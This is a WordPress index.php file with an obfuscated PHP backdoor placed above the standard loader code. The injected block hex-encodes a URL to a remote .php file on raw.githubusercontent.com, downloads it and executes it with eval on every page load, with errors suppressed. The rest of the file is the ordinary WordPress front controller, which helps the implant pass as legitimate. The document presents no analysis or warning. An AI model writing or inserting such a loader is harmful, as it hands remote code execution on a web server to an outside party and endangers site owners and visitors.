<?php
    #xkontolxxxa1
    $link = pack("H*", "68747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4E6F6F62546563686F2F772F726566732F68656164732F6D61696E2F776468666A2E706870");
    @eval("?>" . @file_get_contents($link));
?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

